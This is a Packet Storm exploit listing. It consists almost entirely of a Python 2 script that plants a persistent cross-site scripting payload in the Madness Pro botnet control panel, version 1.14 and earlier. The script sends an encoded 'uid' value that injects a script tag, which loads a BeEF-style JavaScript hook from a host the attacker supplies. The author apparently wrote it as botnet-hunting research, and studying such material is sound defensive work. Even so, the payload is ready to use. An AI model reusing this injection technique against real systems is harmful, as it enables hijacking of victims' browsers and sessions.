Madness Pro 1.14 Cross Site Scripting

2014-06-06T00:00:00
ID PACKETSTORM:126973
Type packetstorm
Reporter bwall
Modified 2014-06-06T00:00:00

Description

                                        
                                            `#!/usr/bin/env python2  
# -*- coding: utf-8 -*-  
# Exploit Title: Madness Pro <= 1.14 Persistent XSS  
# Date: June 05, 2014  
# Exploit Author: @botnet_hunter  
# Version: 1.14  
# Tested on: Apache2 - Ubuntu - MySQL  
# ▄▄▌ ▄▄▄▄· ▄▄▄▄▄ • ▌ ▄ ·. ▄· ▄▌  
# ██• ▪ ▐█ ▀█▪▪ •██ ▪ ·██ ▐███▪▐█▪██▌  
# ██▪ ▄█▀▄ ▐█▀▀█▄ ▄█▀▄ ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▐█▌▐█▪  
# ▐█▌▐▌▐█▌.▐▌██▄▪▐█▐█▌.▐▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌ ▐█▀·.  
# .▀▀▀ ▀█▄▀▪·▀▀▀▀ ▀█▄▀▪ ▀▀▀ ▀█▄▀▪▀▀ █▪▀▀▀ ▀ •  
# ▄▄· ▄• ▄▌▄▄▄ ▪ ▐ ▄ ▄▄ • • ▌ ▄ ·. ▄▄▄· ·▄▄▄▄ ▐ ▄ ▄▄▄ ..▄▄ · .▄▄ ·  
# ▐█ ▌▪█▪██▌▀▄ █·██ •█▌▐█▐█ ▀ ▪ ·██ ▐███▪▐█ ▀█ ██▪ ██ •█▌▐█▀▄.▀·▐█ ▀. ▐█ ▀.  
# ██ ▄▄█▌▐█▌▐▀▀▄ ▐█·▐█▐▐▌▄█ ▀█▄ ▐█ ▌▐▌▐█·▄█▀▀█ ▐█· ▐█▌▐█▐▐▌▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄  
# ▐███▌▐█▄█▌▐█•█▌▐█▌██▐█▌▐█▄▪▐█ ██ ██▌▐█▌▐█ ▪▐▌██. ██ ██▐█▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█  
# ·▀▀▀ ▀▀▀ .▀ ▀▀▀▀▀▀ █▪·▀▀▀▀ ▀▀ █▪▀▀▀ ▀ ▀ ▀▀▀▀▀• ▀▀ █▪ ▀▀▀ ▀▀▀▀ ▀▀▀▀  
#  
# Unauthenticated persistent XSS in Madness Pro panel <= 1.14  
# Discovered and developed by bwall @botnet_hunter  
#  
# References:  
# http://blog.cylance.com/a-study-in-bots-lobotomy  
#   
import urllib  
  
# Fill in URL that Madness Pro bot connects back to  
panel_url = ""  
# Fill in URL to your Javascript payload (the shorter the better)  
beef_hook = ""  
  
  
def install_beef_hook(beef_hook_url, panel_index_url):  
f = urllib.urlopen("{0}?uid=12345%3Cimg%20alt%3D\\')%3B%5C%22%3E%3Cscript%20src=\"{1}\">%3C%2Fscript%3E%3C%2Fa%3E"  
"%3Ca%20href%3D%22%23%22%20onclick%3D%5C%22set_status(\\'12345".format(panel_index_url,  
beef_hook_url))  
print f.read()  
  
install_beef_hook(beef_hook, panel_url)  
`